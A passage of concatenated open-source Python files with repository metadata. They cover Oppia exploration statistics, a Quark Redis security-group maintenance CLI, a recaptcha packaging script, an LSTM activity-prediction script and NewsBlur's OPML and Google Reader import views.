            'state_name': state_name,
            'rule_str': rule_key[1]
        } for rule_key in rule_keys])
    results = {}
    for ind, answer_log in enumerate(answer_logs):
        results['.'.join(rule_keys[ind])] = {
            'answers': answer_log.get_top_answers(5),
            'rule_hits': answer_log.total_answer_count
        }
    return results
def get_top_state_rule_answers(exploration_id, state_name, rule_str_list):
    """Returns a list of top answers (by submission frequency) submitted to the
    given state in the given exploration which were mapped to any of the rules
    listed in 'rule_str_list'. All answers submitted to the specified state and
    match the rule spec strings in rule_str_list are returned.
    """
    # Delegate to the multi-state variant with a single-element state list.
    per_state_answers = get_top_state_rule_answers_multi(
        [(exploration_id, state_name)], rule_str_list)
    return per_state_answers[0]
def get_top_state_rule_answers_multi(exploration_state_list, rule_str_list):
    """Returns a list of top answers (by submission frequency) submitted to the
    given explorations and states which were mapped to any of the rules listed
    in 'rule_str_list' for each exploration ID and state name tuple in
    exploration_state_list.

    For each exploration ID and state, all answers submitted that match any of
    the rule spec strings in rule_str_list are returned.
    """
    answer_logs = (
        stats_domain.StateRuleAnswerLog.get_multi_by_multi_explorations(
            exploration_state_list, rule_str_list))
    results = []
    for log in answer_logs:
        results.append([
            {'value': value, 'count': count}
            for value, count in log.get_all_top_answers()
        ])
    return results
def get_state_improvements(exploration_id, exploration_version):
    """Returns a list of dicts, each representing a suggestion for improvement
    to a particular state.

    Each dict has the keys 'rank' (the count backing the suggestion),
    'state_name' and 'type' (IMPROVE_TYPE_DEFAULT or IMPROVE_TYPE_INCOMPLETE).
    The list is sorted by descending rank, with zero-rank entries dropped.
    """
    ranked_states = []
    exploration = exp_services.get_exploration_by_id(exploration_id)
    state_names = exploration.states.keys()
    # default_rule_answer_logs is positionally aligned with state_names.
    default_rule_answer_logs = stats_domain.StateRuleAnswerLog.get_multi(
        exploration_id, [{
            'state_name': state_name,
            'rule_str': exp_domain.DEFAULT_RULESPEC_STR
        } for state_name in state_names])
    statistics = stats_jobs_continuous.StatisticsAggregator.get_statistics(
        exploration_id, exploration_version)
    state_hit_counts = statistics['state_hit_counts']
    for ind, state_name in enumerate(state_names):
        total_entry_count = 0
        no_answer_submitted_count = 0
        if state_name in state_hit_counts:
            total_entry_count = (
                state_hit_counts[state_name]['total_entry_count'])
            no_answer_submitted_count = state_hit_counts[state_name].get(
                'no_answer_count', 0)
        if total_entry_count == 0:
            continue
        # A state is flagged when more than 20% of its visits end in a
        # default (unhandled) answer that loops back, or in no answer at all.
        threshold = 0.2 * total_entry_count
        default_rule_answer_log = default_rule_answer_logs[ind]
        default_count = default_rule_answer_log.total_answer_count
        eligible_flags = []
        state = exploration.states[state_name]
        if (default_count > threshold and
                state.interaction.default_outcome is not None and
                state.interaction.default_outcome.dest == state_name):
            eligible_flags.append({
                'rank': default_count,
                'improve_type': IMPROVE_TYPE_DEFAULT})
        if no_answer_submitted_count > threshold:
            eligible_flags.append({
                'rank': no_answer_submitted_count,
                'improve_type': IMPROVE_TYPE_INCOMPLETE})
        if eligible_flags:
            # Only the highest-ranked flag is reported for each state.
            eligible_flags = sorted(
                eligible_flags, key=lambda flag: flag['rank'], reverse=True)
            ranked_states.append({
                'rank': eligible_flags[0]['rank'],
                'state_name': state_name,
                'type': eligible_flags[0]['improve_type'],
            })
    return sorted([
        ranked_state for ranked_state in ranked_states
        if ranked_state['rank'] != 0
    ], key=lambda x: -x['rank'])
def get_versions_for_exploration_stats(exploration_id):
    """Returns list of versions for this exploration."""
    annotations_model = stats_models.ExplorationAnnotationsModel
    return annotations_model.get_versions(exploration_id)
def get_exploration_stats(exploration_id, exploration_version):
    """Returns a dict with state statistics for the given exploration id.

    Note that exploration_version should be a string.

    The result contains 'improvements', 'last_updated', 'num_completions',
    'num_starts' and 'state_stats' (a per-state dict of entry counts; states
    with no recorded hits report zero counts).
    """
    exploration = exp_services.get_exploration_by_id(exploration_id)
    exp_stats = stats_jobs_continuous.StatisticsAggregator.get_statistics(
        exploration_id, exploration_version)
    last_updated = exp_stats['last_updated']
    state_hit_counts = exp_stats['state_hit_counts']
    return {
        'improvements': get_state_improvements(
            exploration_id, exploration_version),
        'last_updated': last_updated,
        'num_completions': exp_stats['complete_exploration_count'],
        'num_starts': exp_stats['start_exploration_count'],
        'state_stats': {
            state_name: {
                'name': state_name,
                'firstEntryCount': (
                    state_hit_counts[state_name]['first_entry_count']
                    if state_name in state_hit_counts else 0),
                'totalEntryCount': (
                    state_hit_counts[state_name]['total_entry_count']
                    if state_name in state_hit_counts else 0),
            } for state_name in exploration.states
        },
    }
|
{
"content_hash": "f5e2afbd4ac5874e36532bd6daa9e53a",
"timestamp": "",
"source": "github",
"line_count": 272,
"max_line_length": 80,
"avg_line_length": 38.220588235294116,
"alnum_prop": 0.6168718737976144,
"repo_name": "jestapinski/oppia",
"id": "e893919214081d2d31f9e443990c2e4d73edc4fb",
"size": "11019",
"binary": false,
"copies": "6",
"ref": "refs/heads/develop",
"path": "core/domain/stats_services.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "567034"
},
{
"name": "HTML",
"bytes": "813759"
},
{
"name": "JavaScript",
"bytes": "2463873"
},
{
"name": "Python",
"bytes": "2892341"
},
{
"name": "Shell",
"bytes": "46684"
}
],
"symlink_target": ""
}
|
"""Package initializer: re-export the pnexpose module."""
# Bug fix: the export list was assigned to a stray name `all__`, which has no
# special meaning to Python; the wildcard-export variable must be `__all__`.
__all__ = ['pnexpose']
from pnexpose import *
|
{
"content_hash": "7e56b6e6a128d2045265c8ad85b5f1ad",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 22,
"avg_line_length": 22,
"alnum_prop": 0.6590909090909091,
"repo_name": "divious1/pnexpose",
"id": "18ba0de1f4a25ef2ad16c19190bd0cb8902a4e7c",
"size": "44",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "20916"
}
],
"symlink_target": ""
}
|
"""Quark Redis Security Groups CLI tool.
Usage: redis_sg_tool [-h] [--config-file=PATH] [--retries=<retries>]
[--retry-delay=<delay>] <command> [--yarly]
Options:
-h --help Show this screen.
--version Show version.
--config-file=PATH Use a different config file path
--retries=<retries> Number of times to re-attempt some operations
--retry-delay=<delay> Amount of time to wait between retries
Available commands are:
redis_sg_tool test-connection
redis_sg_tool vifs-in-redis
redis_sg_tool num-groups
redis_sg_tool ports-with-groups
redis_sg_tool purge-orphans [--yarly]
redis_sg_tool write-groups [--yarly]
redis_sg_tool -h | --help
redis_sg_tool --version
"""
import sys
import time
import docopt
import netaddr
from neutron.common import config
import neutron.context
from oslo_config import cfg
from quark.cache import security_groups_client as sg_client
from quark.db import api as db_api
from quark import exceptions as q_exc
VERSION = 0.1  # reported by --version
RETRIES = 5  # default number of attempts for Redis operations that may fail
RETRY_DELAY = 1  # default seconds to wait between retries
class QuarkRedisTool(object):
    """CLI helper that inspects and repairs security-group rules in Redis.

    Commands are dispatched from docopt-parsed arguments; destructive
    commands (purge-orphans, write-groups) run in dry-run mode unless the
    --yarly flag is given.
    """
    def __init__(self, arguments):
        """Store docopt arguments, apply retry overrides and init config.

        Exits the process if no neutron configuration file can be found.
        """
        self._args = arguments
        self._retries = RETRIES
        self._retry_delay = RETRY_DELAY
        if self._args.get("--retries"):
            self._retries = int(self._args["--retries"])
        if self._args.get("--retry-delay"):
            self._retry_delay = int(self._args["--retry-delay"])
        config_args = []
        if self._args.get("--config-file"):
            config_args.append("--config-file=%s" %
                               self._args.pop("--config-file"))
        # Dry run unless explicitly confirmed with --yarly.
        self._dryrun = not self._args.get("--yarly")
        config.init(config_args)
        if not cfg.CONF.config_file:
            sys.exit(_("ERROR: Unable to find configuration file via the "
                       "default search paths (~/.neutron/, ~/, /etc/neutron/, "
                       "/etc/) and the '--config-file' option!"))
    def dispatch(self):
        """Route the parsed <command> to the matching handler method."""
        command = self._args.get("<command>")
        if command == "test-connection":
            self.test_connection()
        elif command == "vifs-in-redis":
            self.vif_count()
        elif command == "num-groups":
            self.num_groups()
        elif command == "ports-with-groups":
            self.ports_with_groups()
        elif command == "purge-orphans":
            self.purge_orphans(self._dryrun)
        elif command == "write-groups":
            self.write_groups(self._dryrun)
        else:
            print("Redis security groups tool. Re-run with -h/--help for "
                  "options")
    def _get_connection(self, giveup=True):
        """Return a pinged Redis security-groups client.

        On failure, exits the process when giveup is True; otherwise returns
        None so callers can retry.
        """
        client = sg_client.SecurityGroupsClient()
        try:
            if client.ping():
                return client
        except Exception as e:
            print(e)
            if giveup:
                print("Giving up...")
                sys.exit(1)
    def test_connection(self):
        """Ping Redis and report the result; returns True on success."""
        client = self._get_connection()
        if client:
            print("Connected Successfully")
            return True
        else:
            print("Could not connect to Redis")
            return False
    def vif_count(self):
        """Print the number of VIF keys in Redis with a security-group hash."""
        client = self._get_connection()
        print(len(client.vif_keys(field=sg_client.SECURITY_GROUP_HASH_ATTR)))
    def num_groups(self):
        """Print the number of security groups in the database."""
        ctx = neutron.context.get_admin_context()
        print(db_api.security_group_count(ctx))
    def ports_with_groups(self):
        """Print the number of ports with security groups in the database."""
        ctx = neutron.context.get_admin_context()
        print(db_api.ports_with_security_groups_count(ctx))
    def purge_orphans(self, dryrun=False):
        """Delete Redis VIF rule sets that have no matching database port.

        In dry-run mode, only reports what would be deleted.
        """
        client = self._get_connection()
        ctx = neutron.context.get_admin_context()
        ports_with_groups = db_api.ports_with_security_groups_find(ctx).all()
        if dryrun:
            print()
            print("Purging orphans in dry run mode. Existing rules in Redis "
                  "will be checked against those in the database. If any "
                  "are found in Redis but lack matching database rules, "
                  "they'll be deleted from the database.\n\nTo actually "
                  "apply the groups, re-run with the --yarly flag.")
            print()
            print("Found %s ports with security groups" %
                  len(ports_with_groups))
        # Pre-spin the list of orphans
        vifs = {}
        for vif in client.vif_keys():
            vifs[vif] = False
        if dryrun:
            print("Found %d VIFs in Redis" % len(vifs))
        # Pop off the ones we find in the database
        for port in ports_with_groups:
            vif_key = client.vif_key(port["device_id"], port["mac_address"])
            vifs.pop(vif_key, None)
        if dryrun:
            print("Found %d orphaned VIF rule sets" % len(vifs))
            print('=' * 80)
        # Whatever is left in `vifs` has no database counterpart.
        for orphan in vifs.keys():
            if dryrun:
                print("VIF %s is orphaned" % orphan)
            else:
                # Retry deletes across transient Redis connection failures.
                for retry in xrange(self._retries):
                    try:
                        client.delete_key(orphan)
                        break
                    except q_exc.RedisConnectionFailure:
                        time.sleep(self._retry_delay)
                        client = self._get_connection(giveup=False)
        if dryrun:
            print('=' * 80)
            print()
            print("Re-run with --yarly to apply changes")
        print("Done!")
    def write_groups(self, dryrun=False):
        """Serialize database security-group rules into Redis per port.

        In dry-run mode, reports which existing Redis rule sets would be
        overwritten instead of writing anything.
        """
        client = self._get_connection()
        ctx = neutron.context.get_admin_context()
        ports_with_groups = db_api.ports_with_security_groups_find(ctx).all()
        if dryrun:
            print()
            print("Writing groups in dry run mode. Existing rules in Redis "
                  "will be checked against those in the database, with a "
                  "running report generated of all those that will be "
                  "overwritten.\n\nTo actually apply the groups, re-run "
                  "with the --yarly flag.")
            print()
            print("Found %s ports with security groups" %
                  len(ports_with_groups))
        if dryrun:
            vifs = len(client.vif_keys())
            if vifs > 0:
                print("There are %d VIFs with rules in Redis, some of which "
                      "may be overwritten!" % vifs)
            print()
        overwrite_count = 0
        for port in ports_with_groups:
            mac = netaddr.EUI(port["mac_address"])
            # Rather than loading everything in one giant chunk, we'll make
            # trips per port.
            group_ids = [g["id"] for g in port.security_groups]
            rules = db_api.security_group_rule_find(ctx, group_id=group_ids,
                                                    scope=db_api.ALL)
            if dryrun:
                existing_rules = client.get_rules_for_port(port["device_id"],
                                                           port["mac_address"])
                if existing_rules:
                    overwrite_count += 1
                    db_len = len(rules)
                    existing_len = len(existing_rules["rules"])
                    print("== Port ID:%s - MAC:%s - Device ID:%s - "
                          "Redis Rules:%d - DB Rules:%d" %
                          (port["id"], mac, port["device_id"], existing_len,
                           db_len))
            if not dryrun:
                # Retry writes across transient Redis connection failures.
                for retry in xrange(self._retries):
                    try:
                        payload = client.serialize_rules(rules)
                        client.apply_rules(
                            port["device_id"], port["mac_address"], payload)
                        break
                    except q_exc.RedisConnectionFailure:
                        time.sleep(self._retry_delay)
                        client = self._get_connection(giveup=False)
        if dryrun:
            print()
            print("Total number of VIFs to overwrite/were overwritten: %s" %
                  overwrite_count)
            diff = vifs - overwrite_count
            if diff > 0:
                print("Orphaned VIFs in Redis:", diff)
                print("Run purge-orphans to clean then up")
        if dryrun:
            print("Total number of VIFs to write: %d" %
                  len(ports_with_groups))
        if dryrun:
            print('=' * 80)
            print("Re-run with --yarly to apply changes")
        print("Done!")
def main():
    """Parse command-line arguments via docopt and dispatch the subcommand."""
    args = docopt.docopt(__doc__,
                         version="Quark Redis CLI %.2f" % VERSION)
    tool = QuarkRedisTool(args)
    tool.dispatch()
if __name__ == "__main__":
    main()
|
{
"content_hash": "f52e4ffacef82701c983e9a810db3ec6",
"timestamp": "",
"source": "github",
"line_count": 250,
"max_line_length": 79,
"avg_line_length": 35.1,
"alnum_prop": 0.5264957264957265,
"repo_name": "roaet/quark",
"id": "f32fb1e70ee6ebdbfb623b234f1501f399113a01",
"size": "9431",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "quark/tools/redis_sg_tool.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "1565663"
},
{
"name": "Shell",
"bytes": "9360"
}
],
"symlink_target": ""
}
|
import os

from setuptools import setup

# Package metadata is read from files next to this script. The files are
# opened with context managers so the handles are closed promptly (the
# previous open(...).read() calls leaked the file objects).
_branch_path = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(_branch_path, 'README.txt')) as _readme_file:
    _readme = _readme_file.read()
with open(os.path.join(_branch_path, 'VERSION.txt')) as _version_file:
    _version = _version_file.readline().rstrip()
setup(
    name='recaptcha',
    version=_version,
    description='Pythonic, well documented and fully featured reCAPTCHA client',
    long_description=_readme,
    classifiers=[
        'Development Status :: 4 - Beta',
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Natural Language :: English',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
        'Topic :: Security',
        ],
    keywords='recaptcha captcha',
    author='2degrees Limited',
    author_email='2degrees-floss@googlegroups.com',
    url='http://packages.python.org/recaptcha',
    download_url='http://pypi.python.org/pypi/recaptcha/',
    license='BSD (http://dev.2degreesnetwork.com/p/2degrees-license.html)',
    py_modules=['recaptcha'],
    zip_safe=False,
    tests_require=['coverage', 'nose'],
    test_suite='nose.collector',
    )
|
{
"content_hash": "fb4ec677e4ca51b912739629274f2696",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 80,
"avg_line_length": 34.578947368421055,
"alnum_prop": 0.639269406392694,
"repo_name": "2degrees/python-recaptcha",
"id": "9bbaa4e369286bf58aa946e06682959be8515c1e",
"size": "2074",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "5609"
},
{
"name": "Python",
"bytes": "31659"
}
],
"symlink_target": ""
}
|
import argparse
import json
import os
from keras.layers import LSTM, BatchNormalization, Dense, Dropout, Input, TimeDistributed
from keras.models import Model
from progressbar import ProgressBar
import h5py
def extract_predicted_outputs(experiment_id,
                              input_dataset,
                              num_cells,
                              num_layers,
                              epoch,
                              output_path,
                              subset=None):
    """Run the trained stateful LSTM over video features and store predictions.

    Rebuilds the classification network (BatchNorm -> dropout -> num_layers
    stacked LSTMs -> softmax over 201 classes), loads the snapshot saved at
    the given epoch for experiment_id, and writes per-video prediction
    arrays into an HDF5 file under output_path, grouped by subset.

    Args:
        experiment_id: identifier used in the snapshot and output file names.
        input_dataset: path to the HDF5 file of per-video feature matrices
            (assumes each video entry is (num_instances, 4096) -- see reshape
            below).
        num_cells: LSTM units per layer (must match the trained model).
        num_layers: number of stacked LSTM layers (must match the trained
            model).
        epoch: training epoch whose weight snapshot should be loaded.
        output_path: directory for the predictions HDF5 file.
        subset: 'validation' or 'testing'; None means both.
    """
    if subset == None:
        subsets = ['validation', 'testing']
    else:
        subsets = [subset]
    weights_path = 'data/model_snapshot/lstm_activity_classification_{experiment_id}_e{nb_epoch:03d}.hdf5'.format(
        experiment_id=experiment_id, nb_epoch=epoch)
    store_file = 'predictions_{experiment_id}.hdf5'.format(
        experiment_id=experiment_id, nb_epoch=epoch)
    store_path = os.path.join(output_path, store_file)
    print('Compiling model')
    # batch_shape=(1, 1, 4096): one video at a time, one timestep per call,
    # so LSTM state carries across calls (stateful=True) within a video.
    input_features = Input(batch_shape=(1, 1, 4096, ), name='features')
    input_normalized = BatchNormalization(name='normalization')(input_features)
    input_dropout = Dropout(p=0.5)(input_normalized)
    lstms_inputs = [input_dropout]
    for i in range(num_layers):
        previous_layer = lstms_inputs[-1]
        # NOTE(review): layer name 'lsmt{}' looks like a typo for 'lstm{}',
        # but it must stay as-is to match the names in the saved weights.
        lstm = LSTM(
            num_cells,
            return_sequences=True,
            stateful=True,
            name='lsmt{}'.format(i + 1))(previous_layer)
        lstms_inputs.append(lstm)
    output_dropout = Dropout(p=0.5)(lstms_inputs[-1])
    output = TimeDistributed(
        Dense(201, activation='softmax'), name='fc')(output_dropout)
    model = Model(input=input_features, output=output)
    model.load_weights(weights_path)
    model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
    print('Model Compiled!')
    h5_dataset = h5py.File(input_dataset, 'r')
    h5_predict = h5py.File(store_path, 'w')
    with open('dataset/videos.json', 'r') as f:
        videos_info = json.load(f)
    for subset in subsets:
        # Only predict videos that belong to this subset AND have features.
        videos = [
            v for v in videos_info.keys() if videos_info[v]['subset'] == subset
        ]
        videos = list(set(videos) & set(h5_dataset.keys()))
        nb_videos = len(videos)
        print('Predicting {} subset...'.format(subset))
        progbar = ProgressBar(max_value=nb_videos)
        count = 0
        output_subset = h5_predict.create_group(subset)
        for video_id in videos:
            progbar.update(count)
            video_features = h5_dataset[video_id][...]
            nb_instances = video_features.shape[0]
            video_features = video_features.reshape(nb_instances, 1, 4096)
            # Reset the LSTM state between videos; batch_size=1 steps through
            # the video's instances in order.
            model.reset_states()
            Y = model.predict(video_features, batch_size=1)
            Y = Y.reshape(nb_instances, 201)
            output_subset.create_dataset(video_id, data=Y)
            count += 1
        progbar.finish()
    h5_dataset.close()
    h5_predict.close()
if __name__ == '__main__':
    # CLI wrapper: collect the prediction parameters and forward them to
    # extract_predicted_outputs.
    parser = argparse.ArgumentParser(
        description='Predict the output with the trained RNN')
    parser.add_argument(
        '--id',
        dest='experiment_id',
        default=0,
        help='Experiment ID to track and not overwrite resulting models')
    parser.add_argument(
        '-i',
        '--video-features',
        type=str,
        dest='video_features',
        default='data/dataset/video_features.hdf5',
        help='File where the video features are stored (default: %(default)s)')
    parser.add_argument(
        '-n',
        '--num-cells',
        type=int,
        dest='num_cells',
        default=512,
        help=
        'Number of cells for each LSTM layer when trained (default: %(default)s)'
    )
    parser.add_argument(
        '--num-layers',
        type=int,
        dest='num_layers',
        default=1,
        help=
        'Number of LSTM layers of the network to train when trained (default: %(default)s)'
    )
    parser.add_argument(
        '-e',
        '--epoch',
        type=int,
        dest='epoch',
        default=100,
        help=
        'epoch at which you want to load the weights from the trained model (default: %(default)s)'
    )
    parser.add_argument(
        '-o',
        '--output',
        type=str,
        dest='output_path',
        default='data/dataset',
        help='path to store the output file (default: %(default)s)')
    parser.add_argument(
        '-s',
        '--subset',
        type=str,
        dest='subset',
        default=None,
        choices=['validation', 'testing'],
        help=
        'Subset you want to predict the output (default: validation and testing)'
    )
    args = parser.parse_args()
    extract_predicted_outputs(args.experiment_id, args.video_features,
                              args.num_cells, args.num_layers, args.epoch,
                              args.output_path, args.subset)
|
{
"content_hash": "29d77530c0b6947363400a91f929d262",
"timestamp": "",
"source": "github",
"line_count": 154,
"max_line_length": 114,
"avg_line_length": 31.928571428571427,
"alnum_prop": 0.5745373195037624,
"repo_name": "imatge-upc/activitynet-2016-cvprw",
"id": "1928bf10d5199176e7f44d0fcf37606fb34093c0",
"size": "4917",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/predict.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "6414241"
},
{
"name": "Python",
"bytes": "66318"
},
{
"name": "Shell",
"bytes": "472"
}
],
"symlink_target": ""
}
|
import datetime
import pickle
import base64
import httplib2
from utils import log as logging
from oauth2client.client import OAuth2WebServerFlow, FlowExchangeError
from bson.errors import InvalidStringData
import uuid
from django.contrib.sites.models import Site
from django.contrib.auth.models import User
# from django.db import IntegrityError
from django.http import HttpResponse, HttpResponseRedirect
from django.conf import settings
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django.contrib.auth import login as login_user
from django.shortcuts import render_to_response
from apps.reader.forms import SignupForm
from apps.reader.models import UserSubscription
from apps.feed_import.models import OAuthToken, GoogleReaderImporter
from apps.feed_import.models import OPMLImporter, OPMLExporter, UploadedOPML
from apps.feed_import.tasks import ProcessOPML, ProcessReaderImport, ProcessReaderStarredImport
from utils import json_functions as json
from utils.user_functions import ajax_login_required, get_user
from utils.feed_functions import TimeoutError
@ajax_login_required
def opml_upload(request):
    """Handle an OPML file upload and import the feeds it lists.

    Returns a JSON payload with 'code' (1 on success, 2 when import was
    deferred to a background task, -1 on error), 'message' and 'payload'
    (folders plus either the user's feeds or task metadata).
    """
    xml_opml = None
    message = "OK"
    code = 1
    payload = {}
    if request.method == 'POST':
        if 'file' in request.FILES:
            logging.user(request, "~FR~SBOPML upload starting...")
            file = request.FILES['file']
            xml_opml = str(file.read().decode('utf-8', 'ignore'))
            # Archive the raw OPML; a failure here only records the error --
            # the import below is still attempted with the decoded text.
            try:
                UploadedOPML.objects.create(user_id=request.user.pk, opml_file=xml_opml)
            except (UnicodeDecodeError, InvalidStringData):
                folders = None
                code = -1
                message = "There was a Unicode decode error when reading your OPML file."
            opml_importer = OPMLImporter(xml_opml, request.user)
            try:
                folders = opml_importer.try_processing()
            except TimeoutError:
                # Too slow to do inline: hand the import to a celery task and
                # tell the client it's delayed (code 2).
                folders = None
                ProcessOPML.delay(request.user.pk)
                feed_count = opml_importer.count_feeds_in_opml()
                logging.user(request, "~FR~SBOPML upload took too long, found %s feeds. Tasking..." % feed_count)
                payload = dict(folders=folders, delayed=True, feed_count=feed_count)
                code = 2
                message = ""
            except AttributeError:
                code = -1
                message = "OPML import failed. Couldn't parse XML file."
                folders = None
            if folders:
                code = 1
                feeds = UserSubscription.objects.filter(user=request.user).values()
                payload = dict(folders=folders, feeds=feeds)
                logging.user(request, "~FR~SBOPML Upload: ~SK%s~SN~SB~FR feeds" % (len(feeds)))
                request.session['import_from_google_reader'] = False
    else:
        message = "Attach an .opml file."
        code = -1
    return HttpResponse(json.encode(dict(message=message, code=code, payload=payload)),
                        mimetype='text/html')
def opml_export(request):
    """Serve the user's subscriptions as a downloadable OPML attachment.

    Staff members may export on behalf of another user via ?user_id=.
    """
    user = get_user(request)
    timestamp = datetime.datetime.now().strftime('%Y-%m-%d')
    if request.REQUEST.get('user_id') and user.is_staff:
        user = User.objects.get(pk=request.REQUEST['user_id'])
    opml = OPMLExporter(user).process()
    response = HttpResponse(opml, mimetype='text/xml')
    disposition = 'attachment; filename=NewsBlur Subscriptions - %s - %s' % (
        user.username,
        timestamp
    )
    response['Content-Disposition'] = disposition
    return response
def reader_authorize(request):
    """Step 1 of the Google Reader OAuth2 flow: send the user to Google.

    Clears stale OAuthToken rows for this user/session/IP and creates a fresh
    one so reader_callback can locate it after the redirect.
    """
    ip = request.META.get('HTTP_X_FORWARDED_FOR', None) or request.META.get('REMOTE_ADDR', "")
    reader_importer = GoogleReaderImporter(request.user)
    if reader_importer.test():
        # Already have a working token; nothing to authorize.
        logging.user(request, "~BB~FW~SBSkipping Google Reader import, already tokened")
        return render_to_response('social/social_connect.xhtml', {
        }, context_instance=RequestContext(request))
    domain = Site.objects.get_current().domain
    # Presumably normalizes non-.com (dev) hosts for the callback URL — TODO confirm.
    STEP2_URI = "http://%s%s" % (
        (domain + '.com') if not domain.endswith('.com') else domain,
        reverse('google-reader-callback'),
    )
    FLOW = OAuth2WebServerFlow(
        client_id=settings.GOOGLE_OAUTH2_CLIENTID,
        client_secret=settings.GOOGLE_OAUTH2_SECRET,
        scope="http://www.google.com/reader/api",
        redirect_uri=STEP2_URI,
        user_agent='NewsBlur Pro, www.newsblur.com',
        approval_prompt="force",
    )
    logging.user(request, "~BB~FW~SBAuthorize Google Reader import - %s" % (
        request.META.get('HTTP_X_FORWARDED_FOR', None) or request.META.get('REMOTE_ADDR', ""),
    ))
    authorize_url = FLOW.step1_get_authorize_url(redirect_uri=STEP2_URI)
    response = render_to_response('social/social_connect.xhtml', {
        'next': authorize_url,
    }, context_instance=RequestContext(request))
    # Save request token and delete old tokens
    auth_token_dict = dict()
    if request.user.is_authenticated():
        OAuthToken.objects.filter(user=request.user).delete()
        auth_token_dict['user'] = request.user
    else:
        # Anonymous: key the token by session and IP instead of user.
        OAuthToken.objects.filter(session_id=request.session.session_key).delete()
        OAuthToken.objects.filter(remote_ip=ip).delete()
    auth_token_dict['uuid'] = str(uuid.uuid4())
    auth_token_dict['session_id'] = request.session.session_key
    auth_token_dict['remote_ip'] = ip
    OAuthToken.objects.create(**auth_token_dict)
    # NOTE(review): the cookie gets a *different* uuid than the token row just
    # created, so the uuid-based lookup in reader_callback can never match —
    # confirm whether this should be auth_token_dict['uuid'].
    response.set_cookie('newsblur_reader_uuid', str(uuid.uuid4()))
    return response
def reader_callback(request):
    """Step 2 of the Google Reader OAuth2 flow: exchange the code for credentials.

    Finds the OAuthToken created in reader_authorize (by user, cookie uuid,
    session key, then remote IP — most specific first) and stores the pickled
    credential on it.
    """
    ip = request.META.get('HTTP_X_FORWARDED_FOR', None) or request.META.get('REMOTE_ADDR', "")
    domain = Site.objects.get_current().domain
    STEP2_URI = "http://%s%s" % (
        (domain + '.com') if not domain.endswith('.com') else domain,
        reverse('google-reader-callback'),
    )
    FLOW = OAuth2WebServerFlow(
        client_id=settings.GOOGLE_OAUTH2_CLIENTID,
        client_secret=settings.GOOGLE_OAUTH2_SECRET,
        scope="http://www.google.com/reader/api",
        redirect_uri=STEP2_URI,
        user_agent='NewsBlur Pro, www.newsblur.com',
    )
    FLOW.redirect_uri = STEP2_URI
    # NOTE(review): this Http object is never passed to step2_exchange —
    # appears unused; confirm whether SSL validation is actually disabled.
    http = httplib2.Http()
    http.disable_ssl_certificate_validation = True
    try:
        credential = FLOW.step2_exchange(request.REQUEST)
    except FlowExchangeError:
        logging.info(" ***> [%s] Bad token from Google Reader." % (request.user,))
        return render_to_response('social/social_connect.xhtml', {
            'error': 'There was an error trying to import from Google Reader. Trying again will probably fix the issue.'
        }, context_instance=RequestContext(request))
    # Locate the token row created in reader_authorize, most specific first.
    user_token = None
    if request.user.is_authenticated():
        user_token = OAuthToken.objects.filter(user=request.user).order_by('-created_date')
    if not user_token:
        user_uuid = request.COOKIES.get('newsblur_reader_uuid')
        if user_uuid:
            user_token = OAuthToken.objects.filter(uuid=user_uuid).order_by('-created_date')
    if not user_token:
        session = request.session
        if session.session_key:
            user_token = OAuthToken.objects.filter(session_id=request.session.session_key).order_by('-created_date')
    if not user_token:
        user_token = OAuthToken.objects.filter(remote_ip=ip).order_by('-created_date')
    if user_token:
        user_token = user_token[0]
        # Pickled OAuth credential stored base64-encoded; only ever unpickle
        # values this app wrote itself.
        user_token.credential = base64.b64encode(pickle.dumps(credential))
        user_token.session_id = request.session.session_key
        user_token.save()
        # Fetch imported feeds on next page load
        request.session['import_from_google_reader'] = True
        logging.user(request, "~BB~FW~SBFinishing Google Reader import - %s" % ip)
    if request.user.is_authenticated():
        return render_to_response('social/social_connect.xhtml', {}, context_instance=RequestContext(request))
    return HttpResponseRedirect(reverse('import-signup'))
@json.json_view
def import_from_google_reader(request):
    """Import Google Reader subscriptions for the logged-in user.

    Returns a dict with ``code`` (0 = not attempted, 2 = delayed to a task,
    otherwise the importer's result), ``delayed``, ``feed_count`` and
    ``starred_count``.
    """
    code = 0
    feed_count = 0
    starred_count = 0
    delayed = False
    if not request.user.is_authenticated():
        return dict(code=code, delayed=delayed, feed_count=feed_count, starred_count=starred_count)
    importer = GoogleReaderImporter(request.user)
    auto_active = bool(request.REQUEST.get('auto_active') or False)
    try:
        code = importer.try_import_feeds(auto_active=auto_active)
    except TimeoutError:
        # Too slow for the request cycle: finish the import in a celery task.
        ProcessReaderImport.delay(request.user.pk, auto_active=auto_active)
        feed_count = UserSubscription.objects.filter(user=request.user).count()
        logging.user(request, "~FR~SBGoogle Reader import took too long, found %s feeds. Tasking..." % feed_count)
        delayed = True
        code = 2
    # The one-shot flag set by reader_callback has served its purpose.
    if 'import_from_google_reader' in request.session:
        del request.session['import_from_google_reader']
    feed_count = UserSubscription.objects.filter(user=request.user).count()
    return dict(code=code, delayed=delayed, feed_count=feed_count, starred_count=starred_count)
@json.json_view
def import_starred_stories_from_google_reader(request):
    """Import Google Reader starred stories for the logged-in user.

    Returns a dict with ``code`` (0 = not attempted, 2 = delayed to a task),
    ``delayed``, ``feed_count`` and ``starred_count``.
    """
    code = 0
    feed_count = 0
    starred_count = 0
    delayed = False
    if not request.user.is_authenticated():
        return dict(code=code, delayed=delayed, feed_count=feed_count, starred_count=starred_count)
    importer = GoogleReaderImporter(request.user)
